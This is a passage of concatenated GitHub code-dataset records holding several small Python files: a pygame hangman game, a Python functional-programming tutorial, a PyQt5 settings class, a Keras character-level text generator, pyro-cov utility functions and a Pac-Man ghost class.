BLACK)\n        btn_text_rect = btn_text.get_rect(center=(button.x + SIZE//2, button.y + SIZE//2))\n        pygame.draw.rect(screen, BLACK, button,2)\n        screen.blit(btn_text, btn_text_rect)\n\n\ndef display_guess():\n    display_word = ''\n\n    for letter in WORD:\n        if letter in GUESSED:\n            display_word += f\"{letter} \"\n        else:\n            display_word += \"_ \"\n\n    text = letter_font.render(display_word, True, BLACK)\n    screen.blit(text, (400, 200))\n\n\npygame.init()\nWIDTH, HEIGHT = 800, 500\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"hangman\")\ngame_over = False\n\n\n# Images\n\nIMAGES = []\nhangman_satus = 0\n\nfor i in range(7):\n    image = pygame.image.load(f\"images/hangman{i}.png\")\n    IMAGES.append(image)\n\n# Buttons\nROWS = 2\nCOLS = 13\nGAP = 20\nSIZE = 40\nBOXES = []\n\nfor row in range(ROWS):\n    for col in range(COLS):\n        x = ((GAP * col) + GAP) + (SIZE * col)\n        y = ((GAP * row) + GAP) + (SIZE * row) + 330\n        box = pygame.Rect(x,y,SIZE,SIZE)\n        BOXES.append(box)\n\nA = 65\nBUTTONS = []\n\nfor ind, box in enumerate(BOXES):\n    letter = chr(A+ind)\n    button = ([box, letter])\n    BUTTONS.append(button)\n\n# Fonts\nbtn_font = pygame.font.SysFont('arial', 30)\nletter_font = pygame.font.SysFont(\"comicsansms\", 60)\ngame_font = pygame.font.SysFont(\"comicsansms\", 40)\n\n\n# Word\nword_liab = 
# Word\nword_list = ['FISHING',\t'WOMAN',\t'BUYER',\t'MANAGER',\t'AD',\t'YEAR',\t'STUDENT',\t'POET'\n,\t'ABILITY',\t'FAMILY',\t'PLAYER',\t'BREATH',\t'COLLEGE',\t'MEAT',\t'STEAK',\t'SPEECH',\t'STORY'\n,\t'CHARITY',\t'COOKIE',\t'POLICY',\t'CELL',\t'THING',\t'GIRL',\t'SKILL',\t'POWER',\t'REALITY'\n,\t'BEDROOM',\t'LADDER',\t'FUNERAL',\t'SCIENCE',\t'ARRIVAL',\t'WRITER',\t'CHEST',\t'SURGERY'\n,\t'ARMY',\t'ORANGE',\t'POETRY',\t'COFFEE',\t'PIE',\t'TRAINER',\t'QUALITY',\t'FOOD',\t'ENERGY'\n,\t'ESTATE',\t'WARNING',\t'EVENT',\t'VERSION',\t'ART',\t'GATE',\t'RATIO']\n\nWORD = random.choice(word_list)\nGUESSED = []\n\n# Title\ntitle = \"Hangman Game\"\ntitle_text = game_font.render(title, True, BLACK)\ntitle_text_rect = title_text.get_rect(center=(WIDTH//2,title_text.get_height()//2+10))\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == QUIT:\n            pygame.quit()\n            sys.exit()\n\n        if event.type == MOUSEBUTTONDOWN:\n            clicked_pos = event.pos\n\n            for button, letter in BUTTONS:\n                if button.collidepoint(clicked_pos):\n                    GUESSED.append(letter)\n\n                    if letter not in WORD:\n                        hangman_status += 1\n\n                        if hangman_status == 6:\n                            game_over = True\n\n                    BUTTONS.remove([button, letter])\n\n    screen.fill(WHITE)\n    screen.blit(IMAGES[hangman_status], (150,100))\n    screen.blit(title_text, title_text_rect)\n    draw_btns(BUTTONS)\n    display_guess()\n\n    won = True\n\n    for letter in WORD:\n        if letter not in GUESSED:\n            won = False\n\n    Emoji=[]\n    if won:\n        game_over = True\n        display_text = 'You Won !!!'\n        image = pygame.image.load(f\"images/hangman{8}.jpg\")\n        Emoji.append(image)\n\n    else:\n        # font.render() cannot draw newline characters, so keep this on one line\n        display_text = f\"You Lost !!! Word was {WORD}\"\n        image = pygame.image.load(f\"images/hangman{7}.jpg\")\n        Emoji.append(image)\n\n    pygame.display.update()\n\n    if game_over:\n        screen.fill(WHITE)\n        game_over_text = game_font.render(display_text, True, BLACK)\n        game_over_text_rect = game_over_text.get_rect(center=(WIDTH//2,HEIGHT//3))\n        screen.blit(game_over_text, game_over_text_rect)\n        screen.blit(Emoji[0], (120, 200))\n        pygame.display.update()\n        pygame.time.delay(4000)\n        pygame.quit()\n        sys.exit()\n\n\n","repo_name":"Shalvi-Singhal/hangman-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"2514150472","text":"\n# coding: utf-8\n\n# In[2]:\n\n########## Lambda = LD / List Comprehension = LC\n# 1. Scoping conditional expressions with parentheses\nres=[];\n\nfor i in range(10):\n    # Without the (), the interpreter fixes the evaluation scope internally as\n    # \"fast\" if (i+1)%3==0 else \"\" + \"campus\"\n    # which is why \"\" + \"campus\" would be produced whenever i+1 is not a multiple of 3.\n    # So it matters to mark each condition off as its own block with ();\n    # the parentheses make each conditional expression evaluate separately.\n    element=(\"fast\" if (i+1)%3==0 else \"\") + (\"camp\" if (i+1)%5==0 else \"\")\n    res.append(element)\n    \nres\n\n\n# In[13]:\n\n# 2. Finding primes\ndef isPrime(number):\n    for i in range(2, number):\n        if number%i==0:\n            return False\n    return True\n\n# assert lets you test a function ahead of time\nassert isPrime(2) == True\n\n\n# In[17]:\n\ndef get_prime(n):\n    arr=[]\n    for i in range(2, n):\n        if isPrime(i):\n            arr.append(i)\n    return arr\n\nget_prime(10)\n\n\n# In[21]:\n\n# 3. Taking parameters as tuples\n# A rewrite of the function from 1\n# the tuples can be passed bundled in []\n\ndef tuple_parameter(n, rule1, rule2):\n    arr=[];\n    for i in range(n):\n        text=\"\"\n        for rule in [rule1, rule2] :\n            #div, val = rule\n            text+=rule[1] if (i+1)%rule[0]==0 else \"\"\n        arr.append(text)\n    return arr\n\ntuple_parameter(10, (3, \"fast\"), (5, \"campus\"))\n\n
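# In[ ]:

# Added check (illustrative): with rules (3, "fast") and (5, "campus"),
# index 2 (i+1 == 3) yields "fast" and index 4 (i+1 == 5) yields "campus".
assert tuple_parameter(10, (3, "fast"), (5, "campus"))[2] == "fast"
assert tuple_parameter(10, (3, "fast"), (5, "campus"))[4] == "campus"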
\n# In[26]:\n\n# 4. Getting the sum and the max of a list\n\ndef get_sum(arr):\n    res=0;\n    for i in arr:\n        res+=i\n    return res\n\nget_sum([1,2,3,4])\n\ndef get_max(arr):\n    res=arr[0]\n    for i in arr:\n        if i > res:\n            res = i\n    return res\n\nget_max([-1,-2,-3,-4,-1])\n\n\n# # 1. Lambda Operator / List Comprehension\n\n# ## 1. map\n\n# In[30]:\n\n# 5. Lambda Operator\n# 5-1. map\n\n# a map that takes a list and multiplies every element by 2\n\nlist(map(lambda x: x * 2, [1,2,3,4]))\n\n# the result of 3, expressed as a lambda operator that takes the count as input\nlist(map(lambda x: (\"fast\" if (x+1)%3==0 else \"\") + (\"camp\" if (x+1)%5==0 else \"\")\n         , range(10)))\n\n\n# In[32]:\n\n# List Comprehension\n[\n    (\"fast\" if (x+1)%3==0 else \"\") + \\\n    (\"camp\" if (x+1)%5==0 else \"\")\n    for x\n    in range(10)\n]\n\n\n# ## 2. filter\n\n# In[41]:\n\n# take a list and return only the positive numbers\n\ndata=[1,-2,3,-5]\n# plain function\ndef get_pos(arr):\n    res=[];\n    for i in arr:\n        if i > 0:\n            res.append(i)\n    return res\n\nget_pos(data)\n\n# Lambda\nlist(filter(lambda x: x > 0, data))\n\n# List Comprehension\n[\n    i\n    for i in data\n    if i>0\n]\n\n\n# In[20]:\n\n# sum_fifth\n# square the numbers 1~10 and keep only the squares greater than 50\ndef sum_fifth():\n    arr=[]\n    for i in range(1, 11):\n        if i**2 > 50:\n            arr.append(i**2);\n    return arr\n\nsum_fifth()\n\n# Lambda\ndef sum_fifth_lambda():\n    return list(filter(lambda x: x>50, map(lambda x: x**2, range(11))))\n\nsum_fifth_lambda()\n\n# List Comprehension\ndef sum_fifth_list():\n    return [\n        i**2\n        for i\n        in range(11)\n        if i**2>50\n    ]\n\nsum_fifth_list()\n\n\n# ## reduce\n\n# In[12]:\n\n# get_sum\n# add up all the values in the list and return the total\nfrom functools import reduce\n\n\ndef get_sum(arr):\n    res=0\n    for i in arr:\n        res+=i\n    return res\n\nreduce(lambda x, y: x+y, range(5))\n\n\n# In[21]:\n\n# get_max\n# return the maximum value of the list\n\ndef get_max(arr):\n    res=arr[0]\n    for i in arr:\n        if i > res:\n            res = i;\n    return res\n\nreduce(lambda x, y: x if (x>y) else y, [1,2,3,-4])\n\n\n# In[58]:\n\n# get_avg\n# take a list of dicts ([{}]) and compute the average of each field\n\ndata=[\n    {\"rent\" : 50,\n     \"deposit\" : 1000\n    },\n    {\"rent\" : 55,\n     \"deposit\" : 2000\n    },\n    {\"rent\" : 60,\n     \"deposit\" : 6000\n    },\n]\n\n\n# In[53]:\n\ndef get_avg(data):\n    res={}\n    rent_sum=0\n    dep_sum=0\n    \n    for i in data:\n        rent_sum+=i[\"rent\"]\n        dep_sum+=i[\"deposit\"]\n    res[\"rent\"]=rent_sum/3\n    res[\"deposit\"]=dep_sum/3\n    \n    return res\n\nget_avg(data)\n\n\n# In[54]:\n\n#reduce(lambda x, y: x[\"rent\"]+y[\"rent\"], data)\n\n# The operation above starts as {\"rent\" : 50, \"deposit\" : 1000} + {\"rent\" : 55, \"deposit\": 2000},\n# i.e. the dicts x and y come in whole and are combined.\n# The second step would then apply the dict built by the first step,\n# i.e. {\"rent\":105} + {\"rent\":60, \"deposit\":6000},\n# so x[\"rent\"]=105 + y[\"rent\"]=60 should be computed.\n# But because x[\"rent\"] + y[\"rent\"] reduces\n# {\"rent\" : 50, \"deposit\" : 1000} + {\"rent\" : 55, \"deposit\": 2000} to the plain number 105,\n# on the second step x=105, so it ends up evaluating 105[\"rent\"] and the reduction fails.\n\nres=reduce(lambda x, y: {\"rent\" : x[\"rent\"]+y[\"rent\"],\n                   \"deposit\" : x[\"deposit\"]+y[\"deposit\"]}\n           , data)\n\n\n# In[55]:\n\nfor i in res:\n    res[i]=res[i]/3\nres\n\n\n# In[62]:\n\nrent_avg=(reduce(lambda x, y: x + y, [\n        i[\"rent\"]\n        for i \n        in data\n    ]))/3\n\nrent_avg\n\n\n# # 2. \\*args, \\**kwargs\n\n# In[70]:\n\n# the concept of packing and unpacking\n\ndef test(*args, **kwargs): # *args packs variadic arguments into a tuple\n    print(args)            # **kwargs packs keyword arguments into a dict\n    print(kwargs) \n    \n\n\n# In[95]:\n\ndata=[1,2,3,4]\n#test((\"test\", \"tes1\"), (\"Test2\", \"test3\"), ok=\"ok\")\ntest(data)\ntest(*data) #unpacking\n\n\n# In[98]:\n\n# for a dict, it seems the structure needs no unpacking here?\ntest((\"test\", \"test1\"), (\"test2\", \"test3\"),test=\"ok\", name=\"power\")\n\n
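# In[ ]:

# Added illustration: to turn a dict into keyword arguments it must be unpacked with **.
opts = {"test": "ok", "name": "power"}
test(("a", "b"), **opts)   # prints args=(('a', 'b'),) and kwargs={'test': 'ok', 'name': 'power'}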
\n# ## 3. Applications\n\n# In[112]:\n\ndef get_args_list(n, *args):\n    arr=[];\n    \n    for i in range(n):\n        text=\"\"\n        for ind, val in args:\n            \n            text+=val if (i+1)%ind==0 else \"\"\n        arr.append(text);\n        \n    return arr\n\n\n# In[113]:\n\nget_args_list(10, (3, \"fast\"), (5, \"test\"), (7, \"ok\"))\n\n\n# In[116]:\n\ndef get_args_lambda(n, *args):\n    return list(map(\n            lambda x: \"\".join(\n                map(lambda y: y[1] if (x+1)%y[0]==0 else \"\"\n                    ,args)\n            )\n        , range(n)))\n\n\n# In[118]:\n\nget_args_lambda(10, (3, \"fast\"), (5, \"test\"), (7, \"ok\"))\n\n\n# In[119]:\n\ndef get_args_test(n, *args):\n    return [\n        \"\".join([\n            val if (i+1)%ind==0 else \"\"\n            for ind, val in args \n        ])\n        for i in range(n)\n    ]\n\n\n# In[120]:\n\nget_args_test(10, (3, \"fast\"), (5, \"test\"), (7, \"ok\"))\n\n","repo_name":"stardustrain/w_keuntaek_han","sub_path":"Class/week2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"1651026313","text":"from PyQt5.QtCore import QSettings\nimport os\n\n\nclass Settings:\n    \"\"\"\n    Holds the settings for sarge\n    \"\"\"\n\n    def __init__(self):\n        self.organisation = \"Bitcast\"\n        self.application = \"sarge\"\n        self.config = QSettings(self.organisation, self.application)\n        changed = False\n        if not self.config.contains(\"columns\"):\n            changed = True\n            self.config.setValue(\"columns\", 2)\n\n        if not self.config.contains(\"files\"):\n            changed = True\n            self.config.setValue(\n                \"files\",\n                [\n                    \"~/music/jingles/Station ID III (2017).mp3\",\n                    \"~/music/jingles/This is UCT Radio (Voice Only).mp3\",\n                    \"~/music/jingles/Transition Effect.mp3\",\n                    \"~/music/jingles/Turn It Up ( The Soundtrack to Your Campus life).mp3\",\n                ],\n            )\n\n        if not self.config.contains(\"music_directory\"):\n            changed = True\n            self.config.setValue(\"music_directory\", \"~/music/library\")\n\n        if not self.config.contains(\"sample_rate\"):\n            changed = True\n            self.config.setValue(\"sample_rate\", 48000)\n\n        if not self.config.contains(\"channels\"):\n            changed = True\n            # Stored as a channel count (1 = mono) so the default round-trips\n            # through the type=int read in sarge_player_channel below.\n            self.config.setValue(\"channels\", 1)\n\n        if changed:\n            del self.config\n            self.config = QSettings(self.organisation, self.application)\n\n    @property\n    def sarge_columns(self):\n        \"\"\"returns number of columns\"\"\"\n        return self.config.value(\"columns\", type=int)\n\n    @sarge_columns.setter\n    def sarge_columns(self, columns):\n        self.config.setValue(\"columns\", columns)\n        del self.config\n        self.config = QSettings(self.organisation, self.application)\n\n    @property\n    def music_directory(self):\n        \"\"\"Returns the music library directory (with ~ expanded)\"\"\"\n        directory = self.config.value(\"music_directory\", type=str)\n        if directory.startswith(\"~\"):\n            return os.path.expanduser(directory)\n        return directory\n\n    @music_directory.setter\n    def music_directory(self, directory):\n        self.config.setValue(\"music_directory\", directory)\n        del self.config\n        self.config = QSettings(self.organisation, self.application)\n\n    @property\n    def sarge_files(self):\n        all_files = self.config.value(\"files\")\n        return all_files\n\n    @sarge_files.setter\n    def sarge_files(self, files):\n        self.config.setValue(\"files\", files)\n        del self.config\n        self.config = QSettings(self.organisation, self.application)\n\n    @property\n    def sarge_player_channel(self):\n        \"\"\"Returns the number of playback channels\"\"\"\n        channels = self.config.value(\"channels\", type=int)\n        return channels\n\n    @sarge_player_channel.setter\n    def sarge_player_channel(self, channel):\n        
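        # Note (added): recreating the QSettings handle after each write mirrors the
        # other setters above; dropping the old object flushes the written value to
        # storage before it is read back.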
self.config.setValue(\"channels\", channel)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n\n @property\n def sarge_player_sample_rate(self):\n \"\"\"Returns details on the play of the songs\"\"\"\n sample_rate = self.config.value(\"sample_rate\", type=int)\n return sample_rate\n\n @sarge_player_sample_rate.setter\n def sarge_player_sample_rate(self, sample_rate):\n self.config.setValue(\"sample_rate\", sample_rate)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n","repo_name":"bitcastza/sarge","sub_path":"sarge/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32394611298","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM, TimeDistributed, Activation\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, Callback\nimport os\n\n#preparing\nfilename = 'data.txt'\nSTART_CHAR = '\\b'\nEND_CHAR = '\\t'\nPADDING_CHAR = '\\a'\nchars = set([START_CHAR, '\\n', END_CHAR])\nwith open(filename, 'r', encoding = 'cp1251') as f:\n for line in f:\n chars.update( list(line.strip().lower()) )\nchar_indeces = {c: i for i,c in enumerate(sorted(list(chars))) }\nchar_indeces[PADDING_CHAR] = 0\nindices_to_chars = {i: c for c,i in char_indeces.items()}\nnum_chars = len(chars)\n# ohe-encoding for symbols\ndef get_one(i, sz):\n res = np.zeros(sz)\n res[i] = 1\n return res\n\nchar_vectors = {\n c: (np.zeros(num_chars) if c == PADDING_CHAR else get_one(v, num_chars))\n for c,v in char_indeces.items()\n }\n# parse sentences\nsentences_end_markers = set('?.!')\nsentences = []\ncurrent_sentence = ''\nwith open(filename, 'r', encoding = 'cp1251') as f:\n for line in f:\n s = line.strip().lower()\n if len(s) > 0:\n current_sentence += s + '\\n'\n if len(s) == 0 or s[-1] in sentences_end_markers:\n current_sentence = current_sentence.strip()\n if len(current_sentence) > 10:\n sentences.append(current_sentence)\n current_sentence = ''\n# make X and y vectors\ndef get_matrices(sentences):\n max_sentence_length =np.max([len(x) for x in sentences])\n X = np.zeros((len(sentences), max_sentence_length, len(chars)), dtype=np.bool)\n y = np.zeros((len(sentences), max_sentence_length, len(chars)), dtype=np.bool)\n for i, sentence in enumerate(sentences):\n char_seq = (START_CHAR + sentence + END_CHAR).ljust(max_sentence_length + 1, PADDING_CHAR)\n for t in range(max_sentence_length):\n X[i,t,:] = char_vectors[char_seq[t]]\n y[i,t,:] = char_vectors[char_seq [t + 1]]\n return X, y \n# making model\nmodel = Sequential()\nmodel.add(LSTM(output_dim = 128, activation='tanh', return_sequences = True, input_dim = num_chars))\nmodel.add(Dropout(0.2))\nmodel.add(TimeDistributed(Dense(output_dim = num_chars)))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy',optimizer = Adam(clipnorm = 1.),metrics=['accuracy'])\n\ntest_indices = np.random.choice(range(len(sentences)), int(len(sentences)*0.05))\nsentences_train = [sentences[x] for x in set(range(len(sentences))) - set(test_indices)]\nsentences_test = [sentences[x] for x in test_indices]\nsentences_train = sorted(sentences_train, key = lambda x:len(x))\nX_test, y_test = get_matrices(sentences_test)\nbatch_size = 16\n\ndef generate_batch():\n while True:\n for i in range( int(len(sentences_train) / batch_size) ):\n sentences_batch = sentences_train[ 
i*batch_size: (i+1)*batch_size]\n            yield get_matrices(sentences_batch)\n\noutput_fname = 'idk.txt'\n\nclass CharSampler(Callback):\n    def __init__(self, char_vectors, model):\n        self.char_vectors = char_vectors\n        self.model = model\n\n    def on_train_begin(self,logs = {}):\n        self.epoch = 0\n        if os.path.isfile(output_fname):\n            os.remove(output_fname)\n    \n    def sample(self, preds, temperature = 1.0):\n        preds = np.asarray(preds).astype('float64')\n        preds = np.log(preds) / temperature\n        exp_preds = np.exp(preds)\n        preds = exp_preds / np.sum(exp_preds)  # renormalize so the multinomial draw gets probabilities\n        probas = np.random.multinomial(1, preds, 1)\n        return np.argmax(probas)\n\n    def sample_one(self, T):\n        result = START_CHAR\n        while len(result) < 500:\n            Xsamples = np.zeros((1, len(result), num_chars))\n            for t,c in enumerate(list(result)):\n                Xsamples[0,t,:] = self.char_vectors[c]\n            ysampled = self.model.predict(Xsamples, batch_size = 1)[0,:]\n            yv = ysampled[len(result) - 1, :]\n            selected_char = indices_to_chars[self.sample(yv, T)]\n            if selected_char == END_CHAR:\n                break\n            result += selected_char\n        return result\n\n    def on_epoch_end(self, batch, logs = {}):\n        self.epoch += 1\n        if self.epoch % 1 == 0:\n            print(\"\\n Epoch %d text sampling:\" % self.epoch)\n            with open(output_fname, 'a') as f:\n                f.write(\"\\n === Epoch %d ===\" % self.epoch)\n                for T in [0.3, 0.5, 0.7, 0.9, 1.1]:\n                    print(\"\\tsampling, T = %.1f\" % T)\n                    for _ in range(5):\n                        self.model.reset_states()\n                        res = self.sample_one(T)\n                        f.write('\\nT = %.1f\\n%s\\n' % (T, res[1:]))\n\n\ncb_logger = CSVLogger('sin_l/' + filename + '.log')\ncb_sampler = CharSampler(char_vectors, model)\n\nmodel.fit_generator(generate_batch(),int(len(sentences_train)/batch_size) *batch_size,epochs = 10, verbose = True,validation_data = (X_test, y_test),callbacks = [cb_logger, cb_sampler])\n","repo_name":"sergey-byk0v/Examples_from_book","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"41115879127","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 11 17:17:07 2021\r\n\r\n@author: yan-s\r\n\"\"\"\r\n\r\ndef yes_no(answer):\r\n    yes = set(['yes','y', 'ye', ''])\r\n    no = set(['no','n'])\r\n    \r\n    while True:\r\n        choice = input(answer).lower()\r\n        if choice in yes:\r\n            return True\r\n        elif choice in no:\r\n            return False\r\n        else:\r\n            print(\"Please respond with 'yes' or 'no'\\n\")","repo_name":"Toppics/Misc","sub_path":"yes_no.py","file_name":"yes_no.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"28643339043","text":"import functools\nimport gzip\nimport itertools\nimport operator\nimport os\nimport weakref\nfrom typing import Dict\n\nimport pyro\nimport torch\nimport tqdm\nfrom torch.distributions import constraints, transform_to\n\n\ndef pearson_correlation(x: torch.Tensor, y: torch.Tensor):\n    x = (x - x.mean()) / x.std()\n    y = (y - y.mean()) / y.std()\n    return (x * y).mean()\n\n\ndef pyro_param(name, shape, constraint=constraints.real):\n    transform = transform_to(constraint)\n    terms = []\n    for subshape in itertools.product(*({1, int(size)} for size in shape)):\n        subname = \"_\".join([name] + list(map(str, subshape)))\n        subinit = functools.partial(torch.zeros, subshape)\n        terms.append(pyro.param(subname, subinit))\n    unconstrained = functools.reduce(operator.add, terms)\n    return transform(unconstrained)\n\n\ndef quotient_central_moments(\n    fine_values: torch.Tensor, fine_to_coarse: 
torch.Tensor\n) -> torch.Tensor:\n \"\"\"\n Returns (zeroth, first, second) central momemnts of each coarse cluster of\n fine values, i.e. (count, mean, stddev).\n\n :returns: A single stacked tensor of shape ``(3,) + fine_values.shape``.\n \"\"\"\n C = 1 + int(fine_to_coarse.max())\n moments = torch.zeros(3, C)\n moments[0].scatter_add_(0, fine_to_coarse, torch.ones_like(fine_values))\n moments[1].scatter_add_(0, fine_to_coarse, fine_values)\n moments[1] /= moments[0]\n fine_diff2 = (fine_values - moments[1][fine_to_coarse]).square()\n moments[2].scatter_add_(0, fine_to_coarse, fine_diff2)\n moments[2] /= moments[0]\n moments[2].sqrt_()\n return moments\n\n\ndef weak_memoize_by_id(fn):\n cache = {}\n missing = object() # An arbitrary value that cannot be returned by fn.\n\n @functools.wraps(fn)\n def memoized_fn(*args):\n key = tuple(map(id, args))\n result = cache.get(key, missing)\n if result is missing:\n result = cache[key] = fn(*args)\n for arg in args:\n # Register callbacks only for types that support weakref.\n if type(arg).__weakrefoffset__:\n weakref.finalize(arg, cache.pop, key, None)\n return result\n\n return memoized_fn\n\n\n_TENSORS: Dict[tuple, torch.Tensor] = {}\n\n\ndef deduplicate_tensor(x):\n key = x.dtype, x.stride(), x.data_ptr()\n return _TENSORS.setdefault(key, x)\n\n\ndef torch_map(x, **kwargs):\n \"\"\"\n Calls ``leaf.to(**kwargs)`` on all tensor and module leaves of a nested\n data structure.\n \"\"\"\n return _torch_map(x, **kwargs)[0]\n\n\n@functools.singledispatch\ndef _torch_map(x, **kwargs):\n return x, False\n\n\n@_torch_map.register(torch.Tensor)\ndef _torch_map_tensor(x, **kwargs):\n x_ = x.to(**kwargs)\n changed = x_ is not x\n return x_, changed\n\n\n@_torch_map.register(torch.nn.Module)\ndef _torch_map_module(x, **kwargs):\n changed = True # safe\n return x.to(**kwargs), changed\n\n\n@_torch_map.register(dict)\ndef _torch_map_dict(x, **kwargs):\n result = type(x)()\n changed = False\n for k, v in x.items():\n v, v_changed = _torch_map(v, **kwargs)\n result[k] = v\n changed = changed or v_changed\n return (result, True) if changed else (x, False)\n\n\n@_torch_map.register(list)\n@_torch_map.register(tuple)\ndef _torch_map_iterable(x, **kwargs):\n result = []\n changed = False\n for v in x:\n v, v_changed = _torch_map(v, **kwargs)\n result.append(v)\n changed = changed or v_changed\n result = type(x)(result)\n return (result, True) if changed else (x, False)\n\n\ndef pretty_print(x, *, name=\"\", max_items=10):\n if isinstance(x, (int, float, str, bool)):\n print(f\"{name} = {repr(x)}\")\n elif isinstance(x, torch.Tensor):\n print(f\"{name}: {type(x).__name__} of shape {tuple(x.shape)}\")\n elif isinstance(x, (tuple, list)):\n print(f\"{name}: {type(x).__name__} of length {len(x)}\")\n elif isinstance(x, dict):\n print(f\"{name}: {type(x).__name__} of length {len(x)}\")\n if len(x) <= max_items:\n for k, v in x.items():\n pretty_print(v, name=f\"{name}[{repr(k)}]\", max_items=max_items)\n else:\n print(f\"{name}: {type(x).__name__}\")\n\n\ndef generate_colors(num_points=100, lb=0.5, ub=2.5):\n \"\"\"\n Constructs a quasirandom collection of colors for plotting.\n \"\"\"\n # http://extremelearning.com.au/unreasonable-effectiveness-of-quasirandom-sequences/\n phi3 = 1.2207440846\n alpha = torch.tensor([1 / phi3**3, 1 / phi3**2, 1 / phi3])\n t = torch.arange(float(2 * num_points))\n rgb = alpha.mul(t[:, None]).add(torch.tensor([0.8, 0.2, 0.1])).fmod(1)\n total = rgb.sum(-1)\n rgb = rgb[(lb <= total) & (total <= ub)]\n rgb = rgb[:num_points]\n assert 
len(rgb) == num_points\n return [f\"#{r:02x}{g:02x}{b:02x}\" for r, g, b in rgb.mul(256).long().tolist()]\n\n\ndef open_tqdm(*args, **kwargs):\n with open(*args, **kwargs) as f:\n with tqdm.tqdm(\n total=os.stat(f.fileno()).st_size,\n unit=\"B\",\n unit_scale=True,\n unit_divisor=1024,\n smoothing=0,\n ) as pbar:\n for line in f:\n pbar.update(len(line))\n yield line\n\n\ndef gzip_open_tqdm(filename, mode=\"rb\"):\n with open(filename, \"rb\") as f, gzip.open(f, mode) as g:\n with tqdm.tqdm(\n total=os.stat(f.fileno()).st_size,\n unit=\"B\",\n unit_scale=True,\n unit_divisor=1024,\n smoothing=0,\n ) as pbar:\n for line in g:\n pbar.n = f.tell()\n pbar.update(0)\n yield line\n","repo_name":"broadinstitute/pyro-cov","sub_path":"pyrocov/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"47"} +{"seq_id":"858799877","text":"#!/usr/bin/python3\n\n\nfrom jk_simplexml import *\n\n\nxRoot = HElement(\"ROOT\")\nxRoot.setAttributeValue(\"foo\", \"bar\")\nxRoot.setChildText(\"Foo bar\")\nx = HElement(\"SomeElement\")\nx.setAttributeValue(\"x\", \"y\")\nx.setAttributeValue(\"y\", \"123\")\nxRoot.children.append(x)\nxRoot.children.append(HText(\"We < are > going & walking\"))\n\n\nwith open(\"test2.html\", \"w\") as f:\n\tf.write(HSerializer.toHTMLDocStr(xRoot))\n\n\n\n","repo_name":"jkpubsrc/python-module-jk-simplexml","sub_path":"examples/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39790876666","text":"import pygame\nimport random\nimport global_variables as gv\n'''I was unable to design a code which follows the pacman so I made every ghost random'''\n\n\nclass Ghost:\n def __init__(self, ghost_type, starting_position):\n self.image = pygame.image.load(gv.GHOST_SOURCE_IMAGES[ghost_type][0]) # load all images\n self.rect = self.image.get_rect() # draw a rectangle around the ghosts\n self.movement_direction = [0, 0]\n self.movement_speed = 4\n self.position = starting_position # starting position is defined in the main file\n\n # let them move randomly\n def set_random_direction(self):\n # change direction every 90 ticks on average\n tick_interval = 30\n change_direction = random.randint(0, tick_interval + 1)\n if change_direction == tick_interval:\n gv.ran_x = random.randint(-1, 1) # random x-direction\n gv.ran_y = 0\n if gv.ran_x == 0:\n y_directions = [-1, 1] # random y-direction\n gv.ran_y = y_directions[random.randint(0, 1)]\n self.movement_direction = [gv.ran_x, gv.ran_y]\n\n # sets the active pixel which is checked in the for-loop in the right direction\n def next_move_is_possible(self):\n offset = [] # the offset describes the shift of the pixel depending on the direction\n ap_direction = []\n if self.movement_direction == gv.directions[0]: # up\n offset = [0, self.movement_speed * (-1)]\n ap_direction = gv.directions[3]\n elif self.movement_direction == gv.directions[1]: # down\n offset = [0, 25 + self.movement_speed]\n ap_direction = gv.directions[3]\n elif self.movement_direction == gv.directions[2]: # left\n offset = [self.movement_speed * (-1), 0]\n ap_direction = gv.directions[1]\n elif self.movement_direction == gv.directions[3]: # right\n offset = [25 + self.movement_speed, 0]\n ap_direction = gv.directions[1]\n elif self.movement_direction == gv.directions[4]: # stationary\n return True\n\n for i in range(25): # the active pixel 
evolves to a whole string\n x = self.position[0] + offset[0] + ap_direction[0] * i\n y = self.position[1] + offset[1] + ap_direction[1] * i\n if gv.screen.get_at([x, y]) == (0, 18, 255, 255): # check if the next step involves a blue pixel\n return False\n\n return True\n\n # if they randomly walk into the portal, they are teleported as well\n def teleport(self):\n if self.position[0] < 18:\n self.position[0] = 965\n elif self.position[0] > 965:\n self.position[0] = 25\n\n # updating position\n def move(self):\n self.set_random_direction() # load the direction and the teleport function\n self.teleport()\n possible_directions = gv.directions.copy()\n del possible_directions[4]\n if self.movement_direction != gv.directions[4]: # deletes the [0,0] direction and the old direction\n del possible_directions[possible_directions.index(self.movement_direction)]\n if not self.next_move_is_possible(): # if the ghost is stuck it changes the direction right away\n self.movement_direction = possible_directions[random.randint(0, 2)]\n x = self.position[0] + (self.movement_speed * self.movement_direction[0])\n y = self.position[1] + (self.movement_speed * self.movement_direction[1])\n self.position = [x, y]\n\n # draw the ghosts onto the surface\n def blit_ghost(self, surface):\n self.rect = self.image.get_rect()\n self.rect.x = self.position[0]\n self.rect.y = self.position[1]\n surface.blit(self.image, 